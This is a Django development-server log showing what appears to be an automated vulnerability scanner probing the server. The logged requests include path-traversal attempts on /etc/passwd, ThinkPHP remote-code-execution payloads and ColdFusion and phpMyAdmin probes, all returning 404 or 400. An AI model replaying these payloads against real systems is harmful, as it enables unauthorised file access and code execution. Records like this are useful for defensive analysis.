[07/Nov/2020 10:17:55] "GET /cgi-bin/phpinfo.php HTTP/1.1" 404 2224
Not Found: /scripts/phpinfo.php
Not Found: /ws/rest/
[07/Nov/2020 10:17:55] "GET /scripts/phpinfo.php HTTP/1.1" 404 2224
[07/Nov/2020 10:17:55] "GET /ws/rest/ HTTP/1.1" 404 2196
Not Found: /LoginPage.do
[07/Nov/2020 10:17:56] "GET /LoginPage.do HTTP/1.1" 404 2208
Not Found: /cgi-bin/php.cgi
[07/Nov/2020 10:17:56] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.1" 404 2224
Not Found: /cgi-bin/ustorekeeper.pl
[07/Nov/2020 10:17:56] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2299
Not Found: /CFIDE/adminapi/administrator.cfc
[07/Nov/2020 10:17:56] "POST /CFIDE/adminapi/administrator.cfc HTTP/1.1" 404 2264
Not Found: /CFIDE/componentutils/cfcexplorer.cfc
[07/Nov/2020 10:17:57] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../license.txt HTTP/1.1" 404 2363
Not Found: /CFIDE/componentutils/cfcexplorer.cfc
[07/Nov/2020 10:17:57] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../../license.html HTTP/1.1" 404 2367
Not Found: /
[07/Nov/2020 10:17:57] "GET / HTTP/1.1" 404 2154
Not Found: /scripts/php.cgi
[07/Nov/2020 10:17:57] "GET /scripts/php.cgi?/etc/passwd HTTP/1.1" 404 2224
Not Found: /scripts/ustorekeeper.pl
[07/Nov/2020 10:17:58] "GET /scripts/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2299
Not Found: /wcm/services/trswcm:SOAPService
[07/Nov/2020 10:18:00] "POST /wcm/services/trswcm:SOAPService HTTP/1.1" 404 2266
Not Found: /wcm/scan_trs.txt
[07/Nov/2020 10:18:01] "GET /wcm/scan_trs.txt HTTP/1.1" 404 2220
Not Found: /
[07/Nov/2020 10:18:04] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 10:18:04] "GET / HTTP/1.1" 404 2154
Not Found: /js/messages.php
[07/Nov/2020 10:18:04] "GET /js/messages.php HTTP/1.1" 404 2217
Not Found: /doc/html/index.html
[07/Nov/2020 10:18:04] "GET /doc/html/index.html HTTP/1.1" 404 2229
Not Found: /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
[07/Nov/2020 10:18:04] "GET /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml HTTP/1.1" 404 2320
Not Found: /Documentation.html
[07/Nov/2020 10:18:04] "GET /Documentation.html HTTP/1.1" 404 2226
Not Found: /phpmyadmin
[07/Nov/2020 10:18:05] "GET /phpmyadmin HTTP/1.1" 404 2202
Not Found: /phpmyadmin/js/messages.php
[07/Nov/2020 10:18:05] "GET /phpmyadmin/js/messages.php HTTP/1.1" 404 2250
Not Found: /phpmyadmin/doc/html/index.html
[07/Nov/2020 10:18:05] "GET /phpmyadmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /phpmyadmin/Documentation.html
[07/Nov/2020 10:18:06] "GET /phpmyadmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /phpMyAdmin
[07/Nov/2020 10:18:06] "GET /phpMyAdmin HTTP/1.1" 404 2202
Not Found: /phpMyAdmin/js/messages.php
[07/Nov/2020 10:18:06] "GET /phpMyAdmin/js/messages.php HTTP/1.1" 404 2250
Not Found: /phpMyAdmin/doc/html/index.html
[07/Nov/2020 10:18:06] "GET /phpMyAdmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /fHevi7rLtsYCJ.html
[07/Nov/2020 10:18:06] "GET /fHevi7rLtsYCJ.html HTTP/1.1" 404 2226
Not Found: /phpMyAdmin/Documentation.html
[07/Nov/2020 10:18:06] "GET /phpMyAdmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /pma
[07/Nov/2020 10:18:06] "GET /pma HTTP/1.1" 404 2181
Not Found: /pma/js/messages.php
[07/Nov/2020 10:18:07] "GET /pma/js/messages.php HTTP/1.1" 404 2229
Not Found: /usage/
[07/Nov/2020 10:18:07] "GET /usage/ HTTP/1.1" 404 2185
Not Found: /pma/doc/html/index.html
[07/Nov/2020 10:18:07] "GET /pma/doc/html/index.html HTTP/1.1" 404 2241
Not Found: /pma/Documentation.html
[07/Nov/2020 10:18:07] "GET /pma/Documentation.html HTTP/1.1" 404 2238
Not Found: /webalizer/
[07/Nov/2020 10:18:07] "GET /webalizer/ HTTP/1.1" 404 2197
Not Found: /index.html
[07/Nov/2020 10:18:07] "GET /index.html HTTP/1.1" 404 2202
Not Found: /invoker/readonly
[07/Nov/2020 10:18:07] "GET /invoker/readonly HTTP/1.1" 404 2220
Not Found: /
[07/Nov/2020 10:18:07] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 10:18:07] "PROPFIND / HTTP/1.1" 404 2159
Not Found: /version
[07/Nov/2020 10:18:09] "GET /version HTTP/1.1" 404 2193
Not Found: /index.php
[07/Nov/2020 10:18:12] "GET /index.php HTTP/1.1" 404 2199
Not Found: /index.php
[07/Nov/2020 10:18:12] "GET /index.php HTTP/1.1" 404 2199
Not Found: /public/index.php
[07/Nov/2020 10:18:12] "GET /public/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=8 HTTP/1.1" 404 2294
Not Found: /public/index.php
[07/Nov/2020 10:18:12] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=cHUyM2Y1Yk9MaW1JOG80Sg== HTTP/1.1" 404 2358
Not Found: /index.php
[07/Nov/2020 10:18:13] "GET /index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=8 HTTP/1.1" 404 2273
Not Found: /index.php
[07/Nov/2020 10:18:13] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=cHUyM2Y1Yk9MaW1JOG80Sg== HTTP/1.1" 404 2337
Not Found: /WEB-INF./web.xml
[07/Nov/2020 10:18:13] "GET /WEB-INF./web.xml HTTP/1.1" 404 2215
Not Found: /
[07/Nov/2020 10:18:19] "GET / HTTP/1.1" 404 2154
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 33866)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:18:37] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 22:18:37] "GET / HTTP/1.0" 404 2154
Not Found: /nice ports,/Trinity.txt.bak
[07/Nov/2020 22:18:37] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 2255
[07/Nov/2020 22:18:37] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[07/Nov/2020 22:18:37] "  " 400 -
Not Found: /
[07/Nov/2020 22:18:37] "OPTIONS / HTTP/1.0" 404 2158
[07/Nov/2020 22:18:37] code 400, message Bad request version ('RTSP/1.0')
[07/Nov/2020 22:18:37] "OPTIONS / RTSP/1.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 37062)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 48880)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 22:18:47] code 400, message Bad request syntax ('HELP')
[07/Nov/2020 22:18:47] "HELP" 400 -
[07/Nov/2020 22:18:47] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[07/Nov/2020 22:18:47] You're accessing the development server over HTTPS, but it only supports HTTP.

----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 58160)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 22:18:52] code 400, message Bad request syntax ('\x01default')
[07/Nov/2020 22:18:52] "default" 400 -
[07/Nov/2020 22:18:52] code 400, message Bad request version ('SIP/2.0')
[07/Nov/2020 22:18:52] "OPTIONS sip:nm SIP/2.0" 400 -
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 59540)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[07/Nov/2020 22:18:57] "GET /?CAVIT HTTP/1.1" 404 2160
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 60038)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[07/Nov/2020 22:19:15] code 400, message Bad request syntax ('\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Ê¹tG\x95\x06áü\x8aw\x7fª\x9e×_²è\x9b\x1b²P3ü`¼/\x8b\x8a\x02ê4@\x00\x00|À,À0À+À/Ì©Ì¨\x00£\x00\x9f\x00¢\x00\x9eÌªÀ¯À\xadÀ$À(À')
[07/Nov/2020 22:19:15] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[07/Nov/2020 22:19:18] "GET / HTTP/1.1" 404 2154
Not Found: /e-cidade/fpdf151/mostrarelatorio.php
[07/Nov/2020 22:19:21] "GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1" 404 2319
Not Found: /
[07/Nov/2020 22:19:22] "GET / HTTP/1.1" 404 2149
Not Found: /
[07/Nov/2020 22:19:22] "GET / HTTP/1.0" 404 2154
Not Found: /
[07/Nov/2020 22:19:22] "GET /" 404 2154
Not Found: /cgi-bin/Web_store/web_store.cgi
[07/Nov/2020 22:19:24] "POST /cgi-bin/Web_store/web_store.cgi HTTP/1.0" 404 2261
Not Found: /chassis/config/GeneralChassisConfig.html
[07/Nov/2020 22:19:25] "GET /chassis/config/GeneralChassisConfig.html HTTP/1.1" 404 2287
Not Found: /phpBB/index.php
[07/Nov/2020 22:19:25] "GET /phpBB/index.php HTTP/1.0" 404 2212
Not Found: /
[07/Nov/2020 22:19:25] "HEAD / HTTP/1.1" 404 2150
Not Found: /
[07/Nov/2020 22:19:25] "HEAD / HTTP/1.0" 404 2150
Not Found: /login.action
[07/Nov/2020 22:19:30] "GET /login.action HTTP/1.1" 404 2208
Not Found: /RsasTest836040814.html
[07/Nov/2020 22:19:30] "GET /RsasTest836040814.html HTTP/1.1" 404 2233
Invalid HTTP_HOST header: '172.16.4.4Content-Length: 49'. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /perl/
[07/Nov/2020 22:19:31] "POST /perl/ HTTP/1.1" 400 61729
Not Found: /console/login/LoginForm.jsp
[07/Nov/2020 22:19:31] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 2253
[07/Nov/2020 22:19:31] code 400, message Bad HTTP/0.9 request type ('t3')
[07/Nov/2020 22:19:31] "t3 12.1.2" 400 -
Not Found: /cgi-bin/webplus
[07/Nov/2020 22:19:32] "GET /cgi-bin/webplus?about HTTP/1.1" 404 2218
Not Found: /cgi-bin/webplus.exe
[07/Nov/2020 22:19:32] "GET /cgi-bin/webplus.exe?about HTTP/1.1" 404 2230
Not Found: /scripts/webplus
[07/Nov/2020 22:19:33] "GET /scripts/webplus?about HTTP/1.1" 404 2218
Not Found: /scripts/webplus.exe
[07/Nov/2020 22:19:33] "GET /scripts/webplus.exe?about HTTP/1.1" 404 2230
Not Found: //etc/passwd
[07/Nov/2020 22:19:36] "GET //etc/passwd HTTP/1.1" 404 2200
Not Found: /docs/docs/OfficeServer.jsp
[07/Nov/2020 22:19:37] "POST /docs/docs/OfficeServer.jsp HTTP/1.1" 404 2251
[07/Nov/2020 22:19:39] code 400, message Bad request version ('request')
[07/Nov/2020 22:19:39] "some invalid request" 400 -
Not Found: /
[07/Nov/2020 22:19:40] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/Aurora-1067527841.html
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.html HTTP/1.1" 404 2257
Not Found: /cgi-bin/Aurora-1067527841.cgi
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.cgi HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1067527841.sh
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.sh HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-1067527841.pl
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.pl HTTP/1.1" 404 2251
Not Found: /cgi-bin/Aurora-1067527841.inc
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.inc HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1067527841.shtml
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.shtml HTTP/1.1" 404 2260
Not Found: /cgi-bin/Aurora-1067527841.asp
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.asp HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1067527841.php
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.php HTTP/1.1" 404 2254
Not Found: /cgi-bin/Aurora-1067527841.php3
[07/Nov/2020 22:19:41] "GET /cgi-bin/Aurora-1067527841.php3 HTTP/1.1" 404 2257
Not Found: /
[07/Nov/2020 22:19:42] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:19:42] "GET / HTTP/1.1" 404 2154
Not Found: /cgi-bin/Aurora-1067527841.cfm
[07/Nov/2020 22:19:42] "GET /cgi-bin/Aurora-1067527841.cfm HTTP/1.1" 404 2254
Not Found: /Aurora-1067527841.html
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.html HTTP/1.1" 404 2233
Not Found: /index
[07/Nov/2020 22:19:42] "GET /index HTTP/1.1" 404 2187
Not Found: /Aurora-1067527841.cgi
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.cgi HTTP/1.1" 404 2230
Not Found: /Aurora-1067527841.sh
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.sh HTTP/1.1" 404 2227
Not Found: /Aurora-1067527841.pl
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.pl HTTP/1.1" 404 2227
Not Found: /Aurora-1067527841.inc
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.inc HTTP/1.1" 404 2230
Not Found: /Aurora-1067527841.shtml
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.shtml HTTP/1.1" 404 2236
Not Found: /Aurora-1067527841.asp
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.asp HTTP/1.1" 404 2230
Not Found: /Aurora-1067527841.php
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.php HTTP/1.1" 404 2230
Not Found: /Aurora-1067527841.php3
[07/Nov/2020 22:19:42] "GET /Aurora-1067527841.php3 HTTP/1.1" 404 2233
Not Found: /Aurora-1067527841.cfm
[07/Nov/2020 22:19:43] "GET /Aurora-1067527841.cfm HTTP/1.1" 404 2230
Not Found: /openmrs/ws/rest/
[07/Nov/2020 22:19:43] "GET /openmrs/ws/rest/ HTTP/1.1" 404 2220
Not Found: /ws/rest/
[07/Nov/2020 22:19:43] "GET /ws/rest/ HTTP/1.1" 404 2196
Not Found: /LoginPage.do
[07/Nov/2020 22:19:46] "GET /LoginPage.do HTTP/1.1" 404 2208
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/
[07/Nov/2020 22:19:47] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/ HTTP/1.1" 404 2323
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
[07/Nov/2020 22:19:47] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp HTTP/1.1" 404 2350
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/default.jsp
[07/Nov/2020 22:19:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/default.jsp HTTP/1.1" 404 2356
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/index.html
[07/Nov/2020 22:19:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.html HTTP/1.1" 404 2353
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/profile.jsp
[07/Nov/2020 22:19:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/profile.jsp HTTP/1.1" 404 2356
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/sort.jsp
[07/Nov/2020 22:19:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/sort.jsp HTTP/1.1" 404 2347
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/topic.jsp
[07/Nov/2020 22:19:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/topic.jsp HTTP/1.1" 404 2350
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/cgi-bin/
[07/Nov/2020 22:19:48] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/cgi-bin/ HTTP/1.1" 404 2347
Not Found: /servlet/org.apache.catalina.servlets.DefaultServlet/scripts/
[07/Nov/2020 22:19:49] "GET /servlet/org.apache.catalina.servlets.DefaultServlet/scripts/ HTTP/1.1" 404 2347
Not Found: /CFIDE/adminapi/administrator.cfc
[07/Nov/2020 22:19:49] "POST /CFIDE/adminapi/administrator.cfc HTTP/1.1" 404 2264
Not Found: /CFIDE/componentutils/cfcexplorer.cfc
[07/Nov/2020 22:19:50] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../license.txt HTTP/1.1" 404 2363
Not Found: /CFIDE/componentutils/cfcexplorer.cfc
[07/Nov/2020 22:19:50] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../../license.html HTTP/1.1" 404 2367
Not Found: /phpinfo.php
[07/Nov/2020 22:19:52] "GET /phpinfo.php HTTP/1.1" 404 2200
Not Found: /cgi-bin/ustorekeeper.pl
[07/Nov/2020 22:19:53] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2299
Not Found: /phpinfo.php
[07/Nov/2020 22:19:53] "GET /phpinfo.php HTTP/1.1" 404 2200
Not Found: /cgi-bin/phpinfo.php
[07/Nov/2020 22:19:53] "GET /cgi-bin/phpinfo.php HTTP/1.1" 404 2224
Not Found: /scripts/phpinfo.php
[07/Nov/2020 22:19:53] "GET /scripts/phpinfo.php HTTP/1.1" 404 2224
Not Found: /
[07/Nov/2020 22:19:53] "GET / HTTP/1.1" 404 2154
Not Found: /wcm/services/trswcm:SOAPService
[07/Nov/2020 22:19:53] "POST /wcm/services/trswcm:SOAPService HTTP/1.1" 404 2266
Not Found: /js/messages.php
[07/Nov/2020 22:19:53] "GET /js/messages.php HTTP/1.1" 404 2217
Not Found: /doc/html/index.html
[07/Nov/2020 22:19:53] "GET /doc/html/index.html HTTP/1.1" 404 2229
Not Found: /Documentation.html
[07/Nov/2020 22:19:53] "GET /Documentation.html HTTP/1.1" 404 2226
Not Found: /phpmyadmin
Not Found: /wcm/scan_trs.txt
[07/Nov/2020 22:19:53] "GET /phpmyadmin HTTP/1.1" 404 2202
[07/Nov/2020 22:19:53] "GET /wcm/scan_trs.txt HTTP/1.1" 404 2220
Not Found: /phpmyadmin/js/messages.php
[07/Nov/2020 22:19:53] "GET /phpmyadmin/js/messages.php HTTP/1.1" 404 2250
Not Found: /phpmyadmin/doc/html/index.html
[07/Nov/2020 22:19:53] "GET /phpmyadmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /scripts/ustorekeeper.pl
[07/Nov/2020 22:19:53] "GET /scripts/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 2299
Not Found: /cgi-bin/php.cgi
[07/Nov/2020 22:19:53] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.1" 404 2224
Not Found: /version
[07/Nov/2020 22:19:53] "GET /version HTTP/1.1" 404 2193
Not Found: /phpmyadmin/Documentation.html
[07/Nov/2020 22:19:54] "GET /phpmyadmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /phpMyAdmin
[07/Nov/2020 22:19:54] "GET /phpMyAdmin HTTP/1.1" 404 2202
Not Found: /phpMyAdmin/js/messages.php
[07/Nov/2020 22:19:54] "GET /phpMyAdmin/js/messages.php HTTP/1.1" 404 2250
Not Found: /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
[07/Nov/2020 22:19:54] "GET /soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml HTTP/1.1" 404 2320
Not Found: /phpMyAdmin/doc/html/index.html
[07/Nov/2020 22:19:54] "GET /phpMyAdmin/doc/html/index.html HTTP/1.1" 404 2262
Not Found: /phpMyAdmin/Documentation.html
[07/Nov/2020 22:19:54] "GET /phpMyAdmin/Documentation.html HTTP/1.1" 404 2259
Not Found: /pma
[07/Nov/2020 22:19:54] "GET /pma HTTP/1.1" 404 2181
Not Found: /pma/js/messages.php
[07/Nov/2020 22:19:54] "GET /pma/js/messages.php HTTP/1.1" 404 2229
Not Found: /pma/doc/html/index.html
[07/Nov/2020 22:19:54] "GET /pma/doc/html/index.html HTTP/1.1" 404 2241
Not Found: /pma/Documentation.html
[07/Nov/2020 22:19:54] "GET /pma/Documentation.html HTTP/1.1" 404 2238
Not Found: /scripts/php.cgi
[07/Nov/2020 22:19:54] "GET /scripts/php.cgi?/etc/passwd HTTP/1.1" 404 2224
Not Found: /
[07/Nov/2020 22:19:54] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:19:55] "GET / HTTP/1.1" 404 2154
Not Found: /usage/
[07/Nov/2020 22:19:56] "GET /usage/ HTTP/1.1" 404 2185
Not Found: /webalizer/
[07/Nov/2020 22:19:56] "GET /webalizer/ HTTP/1.1" 404 2197
Not Found: /index.php
[07/Nov/2020 22:19:56] "GET /index.php HTTP/1.1" 404 2199
Not Found: /index.php
[07/Nov/2020 22:19:56] "GET /index.php HTTP/1.1" 404 2199
Not Found: /public/index.php
[07/Nov/2020 22:19:56] "GET /public/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=8 HTTP/1.1" 404 2294
Not Found: /public/index.php
[07/Nov/2020 22:19:56] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=cHUyM2Y1Yk9MaW1JOG80Sg== HTTP/1.1" 404 2358
Not Found: /index.php
[07/Nov/2020 22:19:57] "GET /index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=8 HTTP/1.1" 404 2273
Not Found: /index.php
[07/Nov/2020 22:19:57] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=cHUyM2Y1Yk9MaW1JOG80Sg== HTTP/1.1" 404 2337
Not Found: /WEB-INF./web.xml
[07/Nov/2020 22:20:00] "GET /WEB-INF./web.xml HTTP/1.1" 404 2215
Not Found: /fHevi7rLtsYCJ.html
[07/Nov/2020 22:20:00] "GET /fHevi7rLtsYCJ.html HTTP/1.1" 404 2226
Not Found: /index.html
[07/Nov/2020 22:20:01] "GET /index.html HTTP/1.1" 404 2202
Not Found: /invoker/readonly
[07/Nov/2020 22:20:01] "GET /invoker/readonly HTTP/1.1" 404 2220
Not Found: /
[07/Nov/2020 22:20:02] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:20:02] "PROPFIND / HTTP/1.1" 404 2159
Not Found: /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#/a
[07/Nov/2020 22:20:11] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a HTTP/1.1" 404 2408
Not Found: /https-admserv/bin/index
[07/Nov/2020 22:20:13] "GET /https-admserv/bin/index HTTP/1.1" 404 2236
Not Found: /
[07/Nov/2020 22:20:13] "GET / HTTP/1.1" 404 2154
Not Found: /
[07/Nov/2020 22:20:16] "GET /?Mode=debug HTTP/1.1" 404 2160
Not Found: /
[07/Nov/2020 22:20:17] "GET / HTTP/1.1" 404 2154
Not Found: /vtiger
[07/Nov/2020 22:20:17] "GET /vtiger HTTP/1.1" 404 2190
Not Found: /vtigercrm
